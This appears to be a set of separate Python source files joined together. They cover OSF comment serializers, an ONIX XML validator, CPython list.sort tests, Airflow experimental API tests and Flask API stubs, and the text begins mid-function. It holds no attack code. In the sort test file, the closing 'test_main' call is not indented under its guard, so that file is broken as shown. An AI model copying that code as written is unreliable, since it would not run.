                    raise PermissionDenied('Not authorized to edit this comment.')
                except ModelValidationError as err:
                    raise ValidationError(err.messages[0])
        return comment

    def get_target_type(self, obj):
        """Target type used in the relationship meta; errors on unknown targets."""
        if not getattr(obj.referent, 'target_type', None):
            raise InvalidModelValueError(
                source={'pointer': '/data/relationships/target/links/related/meta/type'},
                detail='Invalid comment target type.'
            )
        return obj.referent.target_type

    def sanitize_data(self):
        # Strip unsafe HTML from user-supplied content before it is stored.
        ret = super(CommentSerializer, self).sanitize_data()
        content = self.validated_data.get('get_content', None)
        if content:
            ret['get_content'] = bleach.clean(content)
        return ret
class RegistrationCommentSerializer(CommentSerializer):
    """Comment serializer wired to the registration relationship views."""
    replies = RelationshipField(related_view='registrations:registration-comments', related_view_kwargs={'node_id': '<node._id>'}, filter={'target': '<_id>'})
    node = RelationshipField(related_view='registrations:registration-detail', related_view_kwargs={'node_id': '<node._id>'})
class NodeCommentSerializer(CommentSerializer):
    """Comment serializer wired to the node relationship views."""
    replies = RelationshipField(related_view='nodes:node-comments', related_view_kwargs={'node_id': '<node._id>'}, filter={'target': '<_id>'})
    node = RelationshipField(related_view='nodes:node-detail', related_view_kwargs={'node_id': '<node._id>'})
class CommentCreateSerializer(CommentSerializer):
    """Serializer for creating comments; validates the comment target."""

    target_type = ser.SerializerMethodField(method_name='get_validated_target_type')

    def get_validated_target_type(self, obj):
        """Verify the request body's target_type matches the real target."""
        target = obj.target
        target_type = self.context['request'].data.get('target_type')
        expected_target_type = self.get_target_type(target)
        if target_type != expected_target_type:
            raise Conflict(detail=('The target resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the target resource\'s type.'.format(expected_target_type, target_type)))
        return target_type

    def get_target(self, node_id, target_id):
        """Resolve and validate the Guid target.

        :raises ValueError: for missing, cross-node, or uncommentable targets.
        """
        target = Guid.load(target_id)
        if not target or not getattr(target.referent, 'belongs_to_node', None):
            raise ValueError('Invalid comment target.')
        elif not target.referent.belongs_to_node(node_id):
            raise ValueError('Cannot post to comment target on another node.')
        elif isinstance(target.referent, StoredFileNode) and target.referent.provider not in osf_settings.ADDONS_COMMENTABLE:
            raise ValueError('Comments are not supported for this file provider.')
        return target

    def create(self, validated_data):
        """Create the comment after resolving and validating its target."""
        user = validated_data['user']
        auth = Auth(user)
        node = validated_data['node']
        target_id = self.context['request'].data.get('id')
        try:
            target = self.get_target(node._id, target_id)
        except ValueError:
            raise InvalidModelValueError(
                source={'pointer': '/data/relationships/target/data/id'},
                detail='Invalid comment target \'{}\'.'.format(target_id)
            )
        validated_data['target'] = target
        # Comment.create expects 'content'; the serializer field's source
        # is 'get_content', so rename the key before passing through.
        validated_data['content'] = validated_data.pop('get_content')
        try:
            comment = Comment.create(auth=auth, **validated_data)
        except PermissionsError:
            raise PermissionDenied('Not authorized to comment on this project.')
        except ModelValidationError as err:
            raise ValidationError(err.messages[0])
        return comment
class CommentDetailSerializer(CommentSerializer):
    """
    Overrides CommentSerializer to make id required.
    """
    id = IDField(source='_id', required=True)
    # Unlike the base class, 'deleted' is not read-only here, so update()
    # can receive is_deleted for delete/undelete requests.
    deleted = ser.BooleanField(source='is_deleted', required=True)
class RegistrationCommentDetailSerializer(RegistrationCommentSerializer):
    """Registration comment serializer with required id and writable deleted."""
    id = IDField(source='_id', required=True)
    deleted = ser.BooleanField(source='is_deleted', required=True)
class NodeCommentDetailSerializer(NodeCommentSerializer):
    """Node comment serializer with required id and writable deleted."""
    id = IDField(source='_id', required=True)
    deleted = ser.BooleanField(source='is_deleted', required=True)
class CommentReportSerializer(JSONAPISerializer):
    """Serializer for abuse reports filed against a comment."""

    id = IDField(source='_id', read_only=True)
    type = TypeField()
    category = ser.ChoiceField(choices=[('spam', 'Spam or advertising'),
                                        ('hate', 'Hate speech'),
                                        ('violence', 'Violence or harmful behavior')], required=True)
    message = ser.CharField(source='text', required=False, allow_blank=True)
    links = LinksField({'self': 'get_absolute_url'})

    class Meta:
        type_ = 'comment_reports'

    def get_absolute_url(self, obj):
        # Report ids are user ids; the comment id comes from the URL kwargs.
        return absolute_reverse(
            'comments:report-detail',
            kwargs={
                'user_id': obj._id,
                'comment_id': self.context['request'].parser_context['kwargs']['comment_id'],
                'version': self.context['request'].parser_context['kwargs']['version']
            }
        )

    def create(self, validated_data):
        """File a new report; a user may only have one active report."""
        user = self.context['request'].user
        comment = self.context['view'].get_comment()
        # An existing non-retracted report from this user blocks a duplicate.
        if user._id in comment.reports and not comment.reports[user._id].get('retracted', True):
            raise ValidationError('Comment already reported.')
        try:
            comment.report_abuse(user, save=True, **validated_data)
        except ValueError:
            raise ValidationError('You cannot report your own comment.')
        return CommentReport(user._id, **validated_data)

    def update(self, comment_report, validated_data):
        """Update the requesting user's own existing report."""
        user = self.context['request'].user
        comment = self.context['view'].get_comment()
        if user._id != comment_report._id:
            raise ValidationError('You cannot report a comment on behalf of another user.')
        try:
            comment.report_abuse(user, save=True, **validated_data)
        except ValueError:
            raise ValidationError('You cannot report your own comment.')
        return CommentReport(user._id, **validated_data)
class CommentReportDetailSerializer(CommentReportSerializer):
    """
    Overrides CommentReportSerializer to make id required.
    """
    id = IDField(source='_id', required=True)
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from collections import namedtuple
from defusedxml import lxml
from lxml import etree
from onixcheck import schema
from onixcheck.exeptions import OnixError, get_logger
log = get_logger()
class OnixFile(object):
    """Convenience file object wrapper.

    :param infile: File or path to file
    :type infile: file or str
    """

    def __init__(self, infile):
        self.infile = infile
        # Detecting version/style consumes the stream when infile is a file
        # object, so rewind afterwards for later parsing.
        self.meta = OnixMeta.from_file(infile)
        if hasattr(infile, 'seek'):
            self.infile.seek(0)

    def xml_tree(self):
        """
        Parse the infile with lxml and add the proper namespace if required.

        :return etree.ElementTree: An lxml ElementTree with proper namespace
        """
        if hasattr(self.infile, 'seek'):
            self.infile.seek(0)

        tree = lxml.parse(self.infile)

        if self.meta.namespaces:
            # Root element is already namespaced; nothing to patch.
            return tree

        log.debug('Adding namespaces to xml for validation')
        root = tree.getroot()
        # Rebuild the root with the detected default namespace, keeping the
        # original attributes and children.
        ns_root = etree.Element(
            tree.docinfo.root_name,
            root.attrib,
            nsmap={None: self.meta.get_ns_string()}
        )
        ns_root[:] = root[:]

        # Roundtrip to add namespace
        doc = lxml.tostring(
            ns_root,
            encoding=tree.docinfo.encoding,
            xml_declaration=True,
            pretty_print=True
        )
        ns_tree = lxml.fromstring(doc)
        return etree.ElementTree(ns_tree)

    def get_validator(self, schema_type='xsd'):
        """
        Create a matching validator for the ONIX file.

        :param str schema_type: 'xsd' or 'rng' (keys of SCHEMA_TYPE_PARSER_MAP).
        :return etree._Validator:
        """
        parser = self.meta.SCHEMA_TYPE_PARSER_MAP[schema_type]
        return parser(file=self.meta.get_schema_file(schema_type=schema_type))
_BaseMeta = namedtuple('OnixMeta', 'xml_version xml_encoding onix_version onix_style namespaces')


class OnixMeta(_BaseMeta):
    """Read and detect minimal ONIX file properties needed for validation.

    Onix XML files may or may not have `release` and `xmlns` attributes on
    their root element. OnixMeta.from_file(infile) will detect Onix Version
    and Style and also patch the root element with the appropriate namespace
    needed for validation.

    :param str xml_version: XML Version as str ("1.0").
    :param str xml_encoding: XML Encoding as str ("utf-8").
    :param str onix_version: Onix Version as string ("2.1" or "3.0")
    :param str onix_style: Onix Style as str ("short" or "reference")
    :param list namespaces: list of namespace URI strings from the root element
    """

    #: ONIX Version 2.1
    V21 = '2.1'
    #: ONIX Version 3.0
    V30 = '3.0'
    #: Short notation
    SHORT = 'short'
    #: Reference notation
    REFERENCE = 'reference'
    #: Schema Types
    XSD = 'xsd'
    RNG = 'rng'

    ONIX_VERSIONS = (V21, V30)
    ONIX_STYLES = (SHORT, REFERENCE)

    # (version, style, schema-type) -> bundled schema file.
    SCHEMA_MAP = {
        (V21, SHORT, XSD): schema.O21_XSD_SHORT,
        (V21, REFERENCE, XSD): schema.O21_XSD_REFERENCE,
        (V30, SHORT, XSD): schema.O30_XSD_SHORT,
        (V30, SHORT, RNG): schema.O30_RNG_SHORT,
        (V30, REFERENCE, XSD): schema.O30_XSD_REFERENCE,
        (V30, REFERENCE, RNG): schema.O30_RNG_REFERENCE,
    }

    # Schema type -> lxml validator class.
    SCHEMA_TYPE_PARSER_MAP = {
        XSD: etree.XMLSchema,
        RNG: etree.RelaxNG,
    }

    @classmethod
    def from_tree(cls, tree):
        """
        Construct OnixMeta from an ElementTree.

        :param tree etree.ElementTree: LXML Parsed ONIX data
        :return OnixMeta: Initialized OnixMeta instance
        :raises OnixError: on an unrecognized root tag or undetectable version
        """
        root = tree.getroot()

        # Lower-case 'message' marks the short-tag variant.
        if root.tag.endswith('ONIXmessage'):
            onix_style = cls.SHORT
        elif root.tag.endswith('ONIXMessage'):
            onix_style = cls.REFERENCE
        else:
            raise OnixError('Bad root element: %s' % root.tag)

        onix_version = root.attrib.get('release')
        if onix_version is None:
            log.warning('No release attribute on root element. Try namespace.')
            # Fall back to sniffing the version out of the first namespace URI.
            try:
                if cls.V21 in list(root.nsmap.values())[0]:
                    onix_version = cls.V21
                elif cls.V30 in list(root.nsmap.values())[0]:
                    onix_version = cls.V30
                else:
                    # NOTE(review): message typo 'determin' -> 'determine'.
                    raise OnixError('Could not determin ONIX version.')
            except IndexError:
                raise OnixError('No release attribute and no Namespace :(')

        namespaces = list(root.nsmap.values())
        return cls(
            xml_version=tree.docinfo.xml_version,
            xml_encoding=tree.docinfo.encoding,
            onix_version=onix_version,
            onix_style=onix_style,
            namespaces=namespaces
        )

    @classmethod
    def from_file(cls, infile):
        """
        Construct OnixMeta from an infile.

        :param infile: File or Path to file
        :type infile: file or str
        :return OnixMeta: Initialized OnixMeta instance
        """
        tree = lxml.parse(infile)
        return cls.from_tree(tree)

    def get_ns_string(self):
        """Return the namespace URI matching this file's version and style."""
        # NOTE(review): tpl stays unbound if onix_version is neither V21 nor
        # V30, which would raise UnboundLocalError below — TODO confirm
        # whether construction guarantees one of the two.
        if self.onix_version == self.V21:
            tpl = 'http://www.editeur.org/onix/2.1/%s'
        elif self.onix_version == self.V30:
            tpl = 'http://ns.editeur.org/onix/3.0/%s'
        return tpl % self.onix_style

    def get_schema_file(self, schema_type=XSD):
        """Return the bundled schema file for this version/style/schema-type.

        :raises OnixError: when no schema is shipped for the combination.
        """
        key = self.onix_version, self.onix_style, schema_type
        try:
            return self.SCHEMA_MAP[key]
        except KeyError:
            raise OnixError('Found no {2} schema for ONIX {0} {1}'.format(*key))
_BaseMessage = namedtuple('Message', 'level validator location message error_type')


class Message(_BaseMessage):
    """
    A Validation message representing a single error condition.

    :param str level: Error level
    :param str validator: The validator that raised the error
    :param str location: Location of error (filename:line:column)
    :param str message: Description of the error condition
    :param str error_type: Type of error
    """

    def __str__(self):
        # Pipe-separated rendering of all five fields in declaration order.
        return ' | '.join(self._asdict().values())

    @property
    def short(self):
        """Short string representation of message (omits error_type)."""
        return "{m.level} - {m.validator} - {m.location} - {m.message}".format(m=self)

    @classmethod
    def from_logentry(cls, logentry, filename=''):
        """Instantiate Message from an lxml LogEntry object.

        :param _LogEntry logentry: Validation error from LXML
        :param str filename: Optional filename to prefix error location
        :return Message:
        """
        l = logentry
        location = '%s:%s:%s' % (filename, l.line, l.column)
        message = l.message or ''
        # Strip namespace clutter like '{http://...}' from the message text.
        message = re.sub('({.*?})', '', message)
        return cls(
            level=l.level_name,
            validator=l.domain_name,
            location=location,
            message=message,
            error_type=l.type_name
        )

    @classmethod
    def from_exception(cls, exc, filename=''):
        """Build a CRITICAL Message from a raised exception.

        :param Exception exc:
        :param str filename: Optional filename to prefix error location
        :return Message:
        """
        # BUGFIX: Python 3 exceptions have no .message attribute; fall back
        # to str(exc) while preserving the Python 2 behavior.
        return cls(
            level='CRITICAL',
            validator='ONIXCHECK',
            location=filename,
            message=getattr(exc, 'message', str(exc)),
            error_type='EXCEPTION'
        )
| |
from test import support
import random
import sys
import unittest
from functools import cmp_to_key
# Mirror the regression framework's verbosity flag locally.
verbose = support.verbose
# Global tally of check() failures (check() prints and increments this).
nerrors = 0
def check(tag, expected, raw, compare=None):
    """Sort *raw* (optionally via comparator *compare*) and verify that the
    result matches *expected* element-for-element (by identity).

    On mismatch, prints diagnostics, bumps the global error counter and
    returns so the stress loop can continue.
    """
    global nerrors

    if verbose:
        print(" checking", tag)

    orig = raw[:]  # preserved input, reported on failure
    if compare:
        raw.sort(key=cmp_to_key(compare))
    else:
        raw.sort()

    if len(expected) != len(raw):
        print("error in", tag)
        print("length mismatch;", len(expected), len(raw))
        print(expected)
        print(orig)
        print(raw)
        nerrors += 1
        return

    for index, (want, got) in enumerate(zip(expected, raw)):
        # Identity comparison: stability tests rely on the exact objects.
        if want is not got:
            print("error in", tag)
            print("out of order at index", index, want, got)
            print(expected)
            print(orig)
            print(raw)
            nerrors += 1
            return
class TestBase(unittest.TestCase):

    def testStressfully(self):
        """Stress list.sort across many sizes, orders and hostile comparators."""
        # Try a variety of sizes at and around powers of 2, and at powers of 10.
        sizes = [0]
        for power in range(1, 10):
            n = 2 ** power
            sizes.extend(range(n-1, n+2))
        sizes.extend([10, 100, 1000])

        class Complains(object):
            # Comparator that randomly raises, to exercise exception safety.
            maybe_complain = True

            def __init__(self, i):
                self.i = i

            def __lt__(self, other):
                if Complains.maybe_complain and random.random() < 0.001:
                    if verbose:
                        print(" complaining at", self, other)
                    raise RuntimeError
                return self.i < other.i

            def __repr__(self):
                return "Complains(%d)" % self.i

        class Stable(object):
            # Records the original index so stability can be verified.
            def __init__(self, key, i):
                self.key = key
                self.index = i

            def __lt__(self, other):
                return self.key < other.key

            def __repr__(self):
                return "Stable(%d, %d)" % (self.key, self.index)

        for n in sizes:
            x = list(range(n))
            if verbose:
                print("Testing size", n)

            # Already-sorted input.
            s = x[:]
            check("identity", x, s)

            # Fully reversed input.
            s = x[:]
            s.reverse()
            check("reversed", x, s)

            s = x[:]
            random.shuffle(s)
            check("random permutation", x, s)

            # Descending comparator should reproduce the reversed order.
            y = x[:]
            y.reverse()
            s = x[:]
            check("reversed via function", y, s, lambda a, b: (b>a)-(b<a))

            if verbose:
                print(" Checking against an insane comparison function.")
                print(" If the implementation isn't careful, this may segfault.")
            s = x[:]
            s.sort(key=cmp_to_key(lambda a, b: int(random.random() * 3) - 1))
            check("an insane function left some permutation", x, s)

            if len(x) >= 2:
                def bad_key(x):
                    raise RuntimeError
                s = x[:]
                self.assertRaises(RuntimeError, s.sort, key=bad_key)

            # A comparator that raises mid-sort must leave a permutation.
            x = [Complains(i) for i in x]
            s = x[:]
            random.shuffle(s)
            Complains.maybe_complain = True
            it_complained = False
            try:
                s.sort()
            except RuntimeError:
                it_complained = True
            if it_complained:
                Complains.maybe_complain = False
                check("exception during sort left some permutation", x, s)

            # Stability: equal keys must keep their original relative order.
            s = [Stable(random.randrange(10), i) for i in range(n)]
            augmented = [(e, e.index) for e in s]
            augmented.sort()    # forced stable because ties broken by index
            x = [e for e, i in augmented]   # a stable sort of s
            check("stability", x, s)
#==============================================================================
class TestBugs(unittest.TestCase):

    def test_bug453523(self):
        # bug 453523 -- list.sort() crasher.
        # If this fails, the most likely outcome is a core dump.
        # Mutations during a list sort should raise a ValueError.

        class C:
            def __lt__(self, other):
                # Mutate the list being sorted from inside the comparison.
                if L and random.random() < 0.75:
                    L.pop()
                else:
                    L.append(3)
                return random.random() < 0.5

        L = [C() for i in range(50)]
        try:
            L.sort()
        except ValueError:
            pass

    @support.impl_detail(pypy=False)
    def test_undetected_mutation(self):
        # Python 2.4a1 did not always detect mutation
        # So does pypy...
        memorywaster = []
        for i in range(20):
            def mutating_cmp(x, y):
                # Mutation that restores the length before returning.
                L.append(3)
                L.pop()
                return (x > y) - (x < y)
            L = [1,2]
            self.assertRaises(ValueError, L.sort, key=cmp_to_key(mutating_cmp))
            def mutating_cmp(x, y):
                # Mutation that clears the list entirely.
                L.append(3)
                del L[:]
                return (x > y) - (x < y)
            self.assertRaises(ValueError, L.sort, key=cmp_to_key(mutating_cmp))
            memorywaster = [memorywaster]
#==============================================================================
class TestDecorateSortUndecorate(unittest.TestCase):

    def test_decorated(self):
        # key=str.lower and the equivalent comparator must agree.
        data = 'The quick Brown fox Jumped over The lazy Dog'.split()
        copy = data[:]
        random.shuffle(data)
        data.sort(key=str.lower)
        def my_cmp(x, y):
            xlower, ylower = x.lower(), y.lower()
            return (xlower > ylower) - (xlower < ylower)
        copy.sort(key=cmp_to_key(my_cmp))

    def test_baddecorator(self):
        # A two-argument callable is not a valid key function.
        data = 'The quick Brown fox Jumped over The lazy Dog'.split()
        self.assertRaises(TypeError, data.sort, key=lambda x,y: 0)

    def test_stability(self):
        data = [(random.randrange(100), i) for i in range(200)]
        copy = data[:]
        data.sort(key=lambda t: t[0])   # sort on the random first field
        copy.sort()                     # sort using both fields
        self.assertEqual(data, copy)    # should get the same result

    def test_key_with_exception(self):
        # Verify that the wrapper has been removed
        data = list(range(-2, 2))
        dup = data[:]
        self.assertRaises(ZeroDivisionError, data.sort, key=lambda x: 1/x)
        self.assertEqual(data, dup)

    def test_key_with_mutation(self):
        data = list(range(10))
        def k(x):
            # The key function mutates the list being sorted.
            del data[:]
            data[:] = range(20)
            return x
        self.assertRaises(ValueError, data.sort, key=k)

    def test_key_with_mutating_del(self):
        data = list(range(10))
        class SortKiller(object):
            def __init__(self, x):
                pass
            def __del__(self):
                # Mutation happens from a destructor during the sort.
                del data[:]
                data[:] = range(20)
            def __lt__(self, other):
                return id(self) < id(other)
        try:
            data.sort(key=SortKiller)
        except ValueError:
            pass

    def test_key_with_mutating_del_and_exception(self):
        data = list(range(10))
        ## dup = data[:]
        class SortKiller(object):
            def __init__(self, x):
                if x > 2:
                    raise RuntimeError
            def __del__(self):
                del data[:]
                data[:] = list(range(20))
        self.assertRaises(RuntimeError, data.sort, key=SortKiller)
        ## major honking subtlety: we *can't* do:
        ##
        ## self.assertEqual(data, dup)
        ##
        ## because there is a reference to a SortKiller in the
        ## traceback and by the time it dies we're outside the call to
        ## .sort() and so the list protection gimmicks are out of
        ## date (this cost some brain cells to figure out...).

    def test_reverse(self):
        data = list(range(100))
        random.shuffle(data)
        data.sort(reverse=True)
        self.assertEqual(data, list(range(99,-1,-1)))

    def test_reverse_stability(self):
        # reverse=True with a comparator must equal the inverted comparator.
        data = [(random.randrange(100), i) for i in range(200)]
        copy1 = data[:]
        copy2 = data[:]
        def my_cmp(x, y):
            x0, y0 = x[0], y[0]
            return (x0 > y0) - (x0 < y0)
        def my_cmp_reversed(x, y):
            x0, y0 = x[0], y[0]
            return (y0 > x0) - (y0 < x0)
        data.sort(key=cmp_to_key(my_cmp), reverse=True)
        copy1.sort(key=cmp_to_key(my_cmp_reversed))
        self.assertEqual(data, copy1)
        copy2.sort(key=lambda x: x[0], reverse=True)
        self.assertEqual(data, copy2)
#==============================================================================
def test_main(verbose=None):
    """Run the sort test classes; on debug builds with verbose set, rerun
    them several times and print total reference counts."""
    test_classes = (
        TestBase,
        TestDecorateSortUndecorate,
        TestBugs,
    )

    support.run_unittest(*test_classes)

    # verify reference counting
    if verbose and hasattr(sys, "gettotalrefcount"):
        import gc
        counts = []
        for _ in range(5):
            support.run_unittest(*test_classes)
            gc.collect()
            counts.append(sys.gettotalrefcount())
        print(counts)
if __name__ == "__main__":
test_main(verbose=True)
| |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import json
import unittest
from urllib.parse import quote_plus
from airflow import configuration
from airflow.api.common.experimental.trigger_dag import trigger_dag
from airflow.models import DagBag, DagRun, Pool, TaskInstance
from airflow.settings import Session
from airflow.utils.timezone import datetime, utcnow
from airflow.www_rbac import app as application
class TestApiExperimental(unittest.TestCase):
    """Integration tests for the experimental DAG/task REST endpoints."""

    @classmethod
    def setUpClass(cls):
        super(TestApiExperimental, cls).setUpClass()
        # Start from a clean database: drop leftover runs/instances.
        session = Session()
        session.query(DagRun).delete()
        session.query(TaskInstance).delete()
        session.commit()
        session.close()

    def setUp(self):
        super(TestApiExperimental, self).setUp()
        configuration.load_test_config()
        app, _ = application.create_app(testing=True)
        self.app = app.test_client()

    def tearDown(self):
        # Remove rows created by each test so tests stay independent.
        session = Session()
        session.query(DagRun).delete()
        session.query(TaskInstance).delete()
        session.commit()
        session.close()
        super(TestApiExperimental, self).tearDown()

    def test_task_info(self):
        """GET task info: 200 for a real task, 404 for unknown task or dag."""
        url_template = '/api/experimental/dags/{}/tasks/{}'

        response = self.app.get(
            url_template.format('example_bash_operator', 'runme_0')
        )
        self.assertIn('"email"', response.data.decode('utf-8'))
        self.assertNotIn('error', response.data.decode('utf-8'))
        self.assertEqual(200, response.status_code)

        response = self.app.get(
            url_template.format('example_bash_operator', 'DNE')
        )
        self.assertIn('error', response.data.decode('utf-8'))
        self.assertEqual(404, response.status_code)

        response = self.app.get(
            url_template.format('DNE', 'DNE')
        )
        self.assertIn('error', response.data.decode('utf-8'))
        self.assertEqual(404, response.status_code)

    def test_trigger_dag(self):
        """POST dag_runs triggers a run (200); unknown dag returns 404."""
        url_template = '/api/experimental/dags/{}/dag_runs'
        response = self.app.post(
            url_template.format('example_bash_operator'),
            data=json.dumps({'run_id': 'my_run' + utcnow().isoformat()}),
            content_type="application/json"
        )

        self.assertEqual(200, response.status_code)

        response = self.app.post(
            url_template.format('does_not_exist_dag'),
            data=json.dumps({}),
            content_type="application/json"
        )
        self.assertEqual(404, response.status_code)

    def test_trigger_dag_for_date(self):
        """POST with execution_date creates a run for exactly that date."""
        url_template = '/api/experimental/dags/{}/dag_runs'
        dag_id = 'example_bash_operator'
        # Use a future, hour-aligned date to avoid colliding with other runs.
        hour_from_now = utcnow() + timedelta(hours=1)
        execution_date = datetime(hour_from_now.year,
                                  hour_from_now.month,
                                  hour_from_now.day,
                                  hour_from_now.hour)
        datetime_string = execution_date.isoformat()

        # Test Correct execution
        response = self.app.post(
            url_template.format(dag_id),
            data=json.dumps({'execution_date': datetime_string}),
            content_type="application/json"
        )
        self.assertEqual(200, response.status_code)

        dagbag = DagBag()
        dag = dagbag.get_dag(dag_id)
        dag_run = dag.get_dagrun(execution_date)
        self.assertTrue(dag_run,
                        'Dag Run not found for execution date {}'
                        .format(execution_date))

        # Test error for nonexistent dag
        response = self.app.post(
            url_template.format('does_not_exist_dag'),
            data=json.dumps({'execution_date': execution_date.isoformat()}),
            content_type="application/json"
        )
        self.assertEqual(404, response.status_code)

        # Test error for bad datetime format
        response = self.app.post(
            url_template.format(dag_id),
            data=json.dumps({'execution_date': 'not_a_datetime'}),
            content_type="application/json"
        )
        self.assertEqual(400, response.status_code)

    def test_task_instance_info(self):
        """GET task-instance state for a run; 404/400 on bad inputs."""
        url_template = '/api/experimental/dags/{}/dag_runs/{}/tasks/{}'
        dag_id = 'example_bash_operator'
        task_id = 'also_run_this'
        execution_date = utcnow().replace(microsecond=0)
        datetime_string = quote_plus(execution_date.isoformat())
        wrong_datetime_string = quote_plus(
            datetime(1990, 1, 1, 1, 1, 1).isoformat()
        )

        # Create DagRun
        trigger_dag(dag_id=dag_id,
                    run_id='test_task_instance_info_run',
                    execution_date=execution_date)

        # Test Correct execution
        response = self.app.get(
            url_template.format(dag_id, datetime_string, task_id)
        )
        self.assertEqual(200, response.status_code)
        self.assertIn('state', response.data.decode('utf-8'))
        self.assertNotIn('error', response.data.decode('utf-8'))

        # Test error for nonexistent dag
        response = self.app.get(
            url_template.format('does_not_exist_dag', datetime_string,
                                task_id),
        )
        self.assertEqual(404, response.status_code)
        self.assertIn('error', response.data.decode('utf-8'))

        # Test error for nonexistent task
        response = self.app.get(
            url_template.format(dag_id, datetime_string, 'does_not_exist_task')
        )
        self.assertEqual(404, response.status_code)
        self.assertIn('error', response.data.decode('utf-8'))

        # Test error for nonexistent dag run (wrong execution_date)
        response = self.app.get(
            url_template.format(dag_id, wrong_datetime_string, task_id)
        )
        self.assertEqual(404, response.status_code)
        self.assertIn('error', response.data.decode('utf-8'))

        # Test error for bad datetime format
        response = self.app.get(
            url_template.format(dag_id, 'not_a_datetime', task_id)
        )
        self.assertEqual(400, response.status_code)
        self.assertIn('error', response.data.decode('utf-8'))
class TestPoolApiExperimental(unittest.TestCase):
    """Integration tests for the experimental /pools REST endpoints."""

    @classmethod
    def setUpClass(cls):
        super(TestPoolApiExperimental, cls).setUpClass()
        session = Session()
        session.query(Pool).delete()
        session.commit()
        session.close()

    def setUp(self):
        super(TestPoolApiExperimental, self).setUp()
        configuration.load_test_config()
        app, _ = application.create_app(testing=True)
        self.app = app.test_client()
        self.session = Session()
        self.pools = []
        # Seed two pools: experimental_1 (0 slots) and experimental_2 (1 slot).
        for i in range(2):
            name = 'experimental_%s' % (i + 1)
            pool = Pool(
                pool=name,
                slots=i,
                description=name,
            )
            self.session.add(pool)
            self.pools.append(pool)
        self.session.commit()
        self.pool = self.pools[0]

    def tearDown(self):
        self.session.query(Pool).delete()
        self.session.commit()
        self.session.close()
        super(TestPoolApiExperimental, self).tearDown()

    def _get_pool_count(self):
        # Helper: number of pools the API currently reports.
        response = self.app.get('/api/experimental/pools')
        self.assertEqual(response.status_code, 200)
        return len(json.loads(response.data.decode('utf-8')))

    def test_get_pool(self):
        response = self.app.get(
            '/api/experimental/pools/{}'.format(self.pool.pool),
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.data.decode('utf-8')),
                         self.pool.to_json())

    def test_get_pool_non_existing(self):
        response = self.app.get('/api/experimental/pools/foo')
        self.assertEqual(response.status_code, 404)
        self.assertEqual(json.loads(response.data.decode('utf-8'))['error'],
                         "Pool 'foo' doesn't exist")

    def test_get_pools(self):
        response = self.app.get('/api/experimental/pools')
        self.assertEqual(response.status_code, 200)
        pools = json.loads(response.data.decode('utf-8'))
        self.assertEqual(len(pools), 2)
        # API ordering is not asserted; compare sorted by name.
        for i, pool in enumerate(sorted(pools, key=lambda p: p['pool'])):
            self.assertDictEqual(pool, self.pools[i].to_json())

    def test_create_pool(self):
        response = self.app.post(
            '/api/experimental/pools',
            data=json.dumps({
                'name': 'foo',
                'slots': 1,
                'description': '',
            }),
            content_type='application/json',
        )
        self.assertEqual(response.status_code, 200)
        pool = json.loads(response.data.decode('utf-8'))
        self.assertEqual(pool['pool'], 'foo')
        self.assertEqual(pool['slots'], 1)
        self.assertEqual(pool['description'], '')
        self.assertEqual(self._get_pool_count(), 3)

    def test_create_pool_with_bad_name(self):
        # Empty and whitespace-only names must both be rejected.
        for name in ('', '    '):
            response = self.app.post(
                '/api/experimental/pools',
                data=json.dumps({
                    'name': name,
                    'slots': 1,
                    'description': '',
                }),
                content_type='application/json',
            )
            self.assertEqual(response.status_code, 400)
            self.assertEqual(
                json.loads(response.data.decode('utf-8'))['error'],
                "Pool name shouldn't be empty",
            )
        self.assertEqual(self._get_pool_count(), 2)

    def test_delete_pool(self):
        response = self.app.delete(
            '/api/experimental/pools/{}'.format(self.pool.pool),
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.data.decode('utf-8')),
                         self.pool.to_json())
        self.assertEqual(self._get_pool_count(), 1)

    def test_delete_pool_non_existing(self):
        response = self.app.delete(
            '/api/experimental/pools/foo',
        )
        self.assertEqual(response.status_code, 404)
        self.assertEqual(json.loads(response.data.decode('utf-8'))['error'],
                         "Pool 'foo' doesn't exist")
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| |
import os
import atexit
from multiprocessing import cpu_count
from flask import Flask, jsonify
# Populated by prepare(); holds the RequestHandler that backs every endpoint.
request_handler = None
app = Flask('cc-server-web')
@app.route('/', methods=['GET'])
def get_root():
    """
    .. :quickref: User API; Retrieve server version

    Return a JSON object of the form ``{"version": "0.12.2"}``, indicating
    that the server is up and which version it runs.
    """
    return jsonify({'version': '0.12.2'})
@app.route('/nodes/schema', methods=['GET'])
def get_nodes_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the json-schema that validates `POST /nodes <#post--nodes>`__ requests.
    """
    return request_handler.get_nodes_schema()
@app.route('/tasks/schema', methods=['GET'])
def get_tasks_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the json-schema that validates `POST /tasks <#post--tasks>`__ requests.
    """
    return request_handler.get_tasks_schema()
@app.route('/tasks/cancel/schema', methods=['GET'])
def get_tasks_cancel_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the json-schema that validates `POST /tasks/cancel <#post--tasks-cancel>`__ requests.
    """
    return request_handler.get_tasks_cancel_schema()
@app.route('/tasks/query/schema', methods=['GET'])
def get_tasks_query_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the (shared) query json-schema that validates
    `POST /tasks/query <#post--tasks-query>`__ requests.
    """
    return request_handler.get_query_schema()
@app.route('/task-groups/query/schema', methods=['GET'])
def get_task_groups_query_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the (shared) query json-schema that validates
    `POST /task-groups/query <#post--task-groups-query>`__ requests.
    """
    return request_handler.get_query_schema()
@app.route('/application-containers/query/schema', methods=['GET'])
def get_application_containers_query_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the (shared) query json-schema that validates
    `POST /application-containers/query <#post--application-containers-query>`__ requests.
    """
    return request_handler.get_query_schema()
